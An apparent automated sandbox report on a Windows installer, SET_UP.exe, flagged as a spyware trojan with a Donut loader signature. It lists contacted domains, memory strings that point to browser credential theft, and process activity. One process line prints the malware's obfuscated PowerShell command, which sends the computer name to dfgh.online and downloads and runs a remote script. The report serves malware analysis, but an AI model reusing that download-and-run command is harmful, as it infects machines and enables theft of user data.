              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: skinfuzzerz.cyou
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
              Source: global trafficDNS traffic detected: DNS query: dfgh.online
              Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skinfuzzerz.cyou
              Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: SET_UP.exeString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: SET_UP.exeString found in binary or memory: http://crl.starfieldtech.com/repository/0
              Source: SET_UP.exeString found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
              Source: SET_UP.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: SET_UP.exeString found in binary or memory: http://ocsp.starfieldtech.com/0D
              Source: SET_UP.exeString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: SET_UP.exeString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: SET_UP.exeString found in binary or memory: http://s2.symcb.com0
              Source: powershell.exe, 00000004.00000002.2056872307.0000000005111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: SET_UP.exeString found in binary or memory: http://sf.symcb.com/sf.crl0f
              Source: SET_UP.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
              Source: SET_UP.exeString found in binary or memory: http://sf.symcd.com0&
              Source: SET_UP.exeString found in binary or memory: http://sv.symcb.com/sv.crl0W
              Source: SET_UP.exeString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: SET_UP.exeString found in binary or memory: http://sv.symcd.com0&
              Source: SET_UP.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: SET_UP.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: SET_UP.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: SET_UP.exeString found in binary or memory: http://www.innosetup.com/
              Source: SET_UP.exeString found in binary or memory: http://www.remobjects.com/ps
              Source: SET_UP.exeString found in binary or memory: http://www.symauth.com/cps0(
              Source: SET_UP.exeString found in binary or memory: http://www.symauth.com/rpa00
              Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000004.00000002.2056872307.0000000005111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: SET_UP.exe, 00000000.00000003.2032439542.0000000000950000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033447895.0000000000956000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000956000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2036975515.0000000003678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: SET_UP.exeString found in binary or memory: https://d.symcb.com/cps0%
              Source: SET_UP.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: powershell.exe, 00000004.00000002.2064539599.0000000007732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.onlin
              Source: powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online
              Source: SET_UP.exeString found in binary or memory: https://dfgh.online/
              Source: powershell.exe, 00000004.00000002.2055826349.00000000030DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
              Source: powershell.exe, 00000004.00000002.2056281293.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compname=
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.2056872307.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
              Source: SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/;
              Source: SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/Fi
              Source: SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/_B
              Source: SET_UP.exe, SET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035710169.0000000000951000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.000000000095A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000950000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035351543.000000000090D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: SET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txter
              Source: SET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtf1
              Source: SET_UP.exe, 00000000.00000002.2035710169.0000000000951000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtxe
              Source: SET_UP.exe, 00000000.00000003.2032852919.0000000000947000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop:443/int_clp_sha.txt
              Source: powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: SET_UP.exe, 00000000.00000003.1946741383.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1977857592.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1977322995.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1947405272.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1958611404.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1957838245.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1978395050.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1976505025.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1976948513.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1975769207.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973906418.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1976169185.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946456682.0000000003676000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2004113254.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/
              Source: SET_UP.exe, 00000000.00000003.1957745990.0000000003687000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1958214464.000000000368B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2003997079.000000000368B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032739834.000000000368B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033008758.000000000368B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/88q
              Source: SET_UP.exe, 00000000.00000003.1946540619.0000000003680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/A
              Source: SET_UP.exe, 00000000.00000003.1946741383.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1947405272.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/K
              Source: SET_UP.exe, 00000000.00000003.1946741383.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1947405272.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/RN
              Source: SET_UP.exe, 00000000.00000003.2004113254.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/Y
              Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1957838245.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2004113254.000000000094F000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973906418.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2004113254.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/api
              Source: SET_UP.exe, 00000000.00000003.1958611404.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1957838245.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/c
              Source: SET_UP.exe, 00000000.00000003.1975769207.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973906418.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou/s
              Source: SET_UP.exe, 00000000.00000003.2004113254.000000000094F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skinfuzzerz.cyou:443/api
              Source: SET_UP.exe, 00000000.00000003.1922330613.0000000003714000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: SET_UP.exe, 00000000.00000003.1922330613.0000000003712000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946395569.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1922484124.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946521144.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: SET_UP.exe, 00000000.00000003.1922484124.00000000036A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: SET_UP.exe, 00000000.00000003.1922330613.0000000003712000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946395569.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1922484124.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946521144.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: SET_UP.exe, 00000000.00000003.1922484124.00000000036A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: SET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49758 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: SET_UP.exeStatic PE information: invalid certificate
              Source: SET_UP.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: SET_UP.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: SET_UP.exe, 00000000.00000000.1729232614.000000000051F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
              Source: SET_UP.exe, 00000000.00000003.1897592734.0000000003067000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
              Source: SET_UP.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
              Source: SET_UP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@5/2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgb1yaxp.xwn.ps1Jump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: SET_UP.exe, 00000000.00000003.1946456682.0000000003689000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: SET_UP.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: SET_UP.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: SET_UP.exeString found in binary or memory: /LoadInf=
              Source: SET_UP.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: C:\Users\user\Desktop\SET_UP.exeFile read: C:\Users\user\Desktop\SET_UP.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SET_UP.exe "C:\Users\user\Desktop\SET_UP.exe"
              Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dnsapi.dllJump to behavior
